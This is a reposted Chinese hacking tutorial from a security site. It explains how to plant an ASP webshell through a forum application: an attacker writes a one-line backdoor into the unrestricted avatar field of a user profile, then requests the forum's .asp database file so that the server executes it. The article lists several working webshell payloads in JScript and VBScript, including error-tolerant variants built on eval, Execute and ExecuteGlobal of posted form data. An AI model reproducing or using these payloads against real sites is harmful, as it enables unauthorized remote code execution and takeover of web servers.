您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 电脑技术 查看内容

修改数据库得到webshell

2004-10-20 07:34| 投稿: computer

摘要: 作者:虚幻灵者  http://www.wrsky.com 在海洋2005中新增了一个向数据库写代码从而插入后门的方法。既然asp后门可以向数据库写后门。我们为什么不可以呢。就拿最新版的盗帅作例子,...
作者:虚幻灵者  http://www.wrsky.com 在海洋2005中新增了一个向数据库写代码从而插入后门的方法。既然asp后门可以向数据库写后门。我们为什么不可以呢。就拿最新版的盗帅作例子,我们可以注册成功后在修改个人资料中的头像中向数据库写入asp后门的代码,因为只有这个地方没有长度限制。<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('xuhuan')+'')</SCRIPT><%on error resume next//以上语句是将一个微型asp后门写入到数据库中,<%on error resume next用来容错,//用来将后面的干扰代码注释掉!这样当我们提交盗帅的数据库路径http://www.xxx.com/db/daidalos.asp时,由于后缀为asp,IE将会以asp的形式解析代码。我们的asp后门也就成功执行了!用微型asp后门的客户端连接试试.能不能连上了! 补充: 附:1:JAVASCRIPT<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>容错格式:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>2:VBSCRIPT<%Execute(Request.form("?"))%>容错格式:Execute("On Error Resume Next:"&Request.form("?"))VBSCRIPT的另一函数:<%ExecuteGlobal(Request.form("!"))%>容错格式:<%ExecuteGlobal("On Error Resume Next:"&Request.form("!"))%>

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部